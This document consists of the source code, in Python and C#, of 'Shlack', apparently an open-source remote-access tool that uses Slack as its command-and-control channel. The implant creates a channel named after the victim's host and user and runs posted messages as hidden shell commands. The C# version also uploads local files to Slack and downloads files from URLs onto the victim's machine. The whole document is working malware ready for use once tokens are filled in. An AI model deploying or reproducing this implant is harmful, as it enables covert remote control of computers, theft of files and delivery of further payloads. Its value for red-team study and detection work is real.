File: Shlack.py
import slack, subprocess
from getpass import getuser

slack_token = 'CHANGE THIS'
oauth_token = 'CHANGE THIS'

client = slack.WebClient(token=slack_token)
oauth_client = slack.WebClient(token=oauth_token)


def run_command(cmd):
    return subprocess.Popen(cmd,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, shell=True).communicate()
                            
def create_channel(Chan_name): 
    global targetID #Varibale to apply command only to the inteded host
    Chan_name = Chan_name.lower()
    response = client.channels_list()
    channels_list = []
    for n in response['channels']: #Go through all channels and make sure that we do not create an existing one.
        channels_list.append(n['name'])
        if(Chan_name == n['name']):
            client.chat_postMessage(channel='#general', text='[*] Channel '+Chan_name+' is already exists.')
            targetID = n['id'] #If the channel exists, make sure to assign the shell to that channel.
            return
    
    if(Chan_name not in channels_list): #Create the channel and assign targetID if is not found
        response = oauth_client.conversations_create(
            name=Chan_name,
            is_private=False
        )
        targetID = response['channel']['id']
        client.chat_postMessage(channel='#general', text='[+] Channel '+Chan_name+' is created. Have fun :)')


@slack.RTMClient.run_on(event='hello')
def start(**payload): #Each time the shell connect to Slack servers.
    global whoami
    cmd = ['hostname'] #Prepare the command to grab hostname/username.
    result = run_command(cmd) #Run the command.
    whoami = str(result[0].decode('utf-8') + '\\' + getuser()).replace('\r','').replace('\\','_').replace('\n','') #Store the result for later use.
    create_channel(whoami) #Create a channel named as the result of the command.


@slack.RTMClient.run_on(event='message')
def messaging(**payload): #Triggers each time the bot get a new message Note: the app must be part of that group to receive messages.
        data = payload['data']
        if ('subtype' in data and data['subtype'] == 'bot_message'): #To make sure that we do not execute the bot response.
            return
        if (data['channel'] == targetID): #To make sure we only execute the command on the intended bot.
            web_client = payload['web_client']
            rtm_client = payload['rtm_client']
            cmd = data['text'] #Shell command
            result = run_command(cmd)
            client.chat_postMessage(channel="#"+whoami, text='Output: '+str(result[0].decode('utf-8')))
        else:
            pass

rtm_client = slack.RTMClient(token=slack_token)
rtm_client.start()


async def run_api_test():
    response = await client.api_test()
    assert response["ok"]
    
if __name__ == "__main__":
    event_loop = asyncio.get_event_loop()
    event_loop.run_until_complete(run_api_test())

File: Shlack.cs
using System;
using System.Diagnostics;
using SlackAPI;
using System.Threading;

namespace Shlack_C2
{
    class Program
    {
        static void Main(string[] args)
        {
            string slack_token = "xoxb-TokenIsHERE"; //CHANGE THIS
            string oauth_token = "xoxp-TokenIsHERE"; //CHANGE THIS
        
            string targetID = ""; //This is to only accept messages sent through the created channel. Otherwise, any message received by the bot is to be executed.
            ManualResetEventSlim clientReady = new ManualResetEventSlim(false);
            SlackSocketClient client = new SlackSocketClient(slack_token);
            SlackSocketClient oauth_client = new SlackSocketClient(oauth_token);
            client.Connect((connected) => {
                // This is called once the client has emitted the RTM start command
                clientReady.Set();
            }, () => {
                // This is called once the RTM client has connected to the end point
            });
            client.OnMessageReceived += (message) =>
            {
                // Handle each message as you receive them
                if (message.bot_id == null && targetID == message.channel) //Only execute messages sent by users
                {
                    switch (message.text.ToLower().Split(' ')[0])
                    {
                        case "exit": //Terminate the shell
                            client.PostMessage(null, message.channel.ToString(), "Channel Terminated!");
                            Thread.Sleep(20);
                            Environment.Exit(1);
                            break;
                        case "upload": //Upload local files to Slack channel
                            string[] ch = new string[1];
                            ch[0] = message.channel.ToString();
                            try
                            {
                                string path = message.text.ToLower().Split(new[] { ' ' }, 2)[1];
                                client.UploadFile(null, System.IO.File.ReadAllBytes(path), System.IO.Path.GetFileName(path), ch);
                            }
                            catch (Exception e)
                            {
                                client.PostMessage(null, message.channel.ToString(), e.Message);
                            }
                            break;

                        case "download": //Download files to the victim .. download [URL] [NameOfFile/Path]
                            string @remoteUri = message.text.Split(new[] { ' ' }, 3)[1];
                            string @fileName = message.text.Split(new[] { ' ' }, 3)[2];
                            using (var down = new System.Net.WebClient())
                            {
                                try
                                {
                                    //remoteUri = System.Uri.EscapeDataString(remoteUri);
                                    remoteUri = remoteUri.Replace(">", "");
                                    remoteUri = remoteUri.Replace("<", "");
                                    down.DownloadFile(@remoteUri, @fileName);
                                }
                                catch (Exception e)
                                {
                                    client.PostMessage(null, message.channel.ToString(), e.Message.ToString());
                                }
                                break;
                            }

                        default:
                            string output = Execute(message.text);
                            client.PostMessage(null, message.channel.ToString(), output);
                            break;
                    }
                }
            };
            clientReady.Wait();

            string chan_name = (System.Net.Dns.GetHostName() + "_" + Environment.UserName).ToLower(); //Grab Hostname and Username for the channel name
            client.GetChannelList(null);
            var general = client.Channels.Find(x => x.name.Equals("general"));
            oauth_client.ChannelsCreate((response) => { //Create channel and assigne the targetID
                if (response.ok)
                {
                    client.PostMessage(null, general.id, "[+] Channel " + chan_name + " is created. Have fun :)");
                    targetID = response.channel.id.ToString();

                }
                else if (response.error == "name_taken")
                {
                    client.PostMessage(null, general.id, "[*] Channel " + chan_name + " is already exists.");
                    targetID = client.Channels.Find(x => x.name.Equals(chan_name)).id;
                }
                else
                {
                    client.PostMessage(null, general.id, "[-] Channel " + chan_name + " " + response.error.ToString());
                }

            }, chan_name);


            while (true) { Thread.Sleep(1000); }
        }

        public static string Execute(string cmd) //Excute command in cmd.exe
        {
            cmd = Contaminate(cmd);
            try
            {
                // Start the child process.
                Process p = new Process();
                // Redirect the output stream of the child process.
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardError = true;
                p.StartInfo.FileName = "cmd.exe";
                p.StartInfo.CreateNoWindow = true;
                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                p.StartInfo.Arguments = "/c" + cmd;

                p.Start();
                // Do not wait for the child process to exit before
                // reading to the end of its redirected stream.
                // p.WaitForExit();
                // Read the output stream first and then wait.
                string output = p.StandardOutput.ReadToEnd();
                string error = p.StandardError.ReadToEnd();
                p.WaitForExit();

                return error + output;
            }
            catch (Exception e)
            {
                return e.Message;
            }
        }

        public static string Contaminate(string original) //This just replaces sanitized chars
        {
            string edited = original;
            edited = edited.Replace("&gt;", ">");
            edited = edited.Replace("&lt;", "<");
            edited = edited.Replace("&amp;", "&");

            return edited;
        }
    }

}
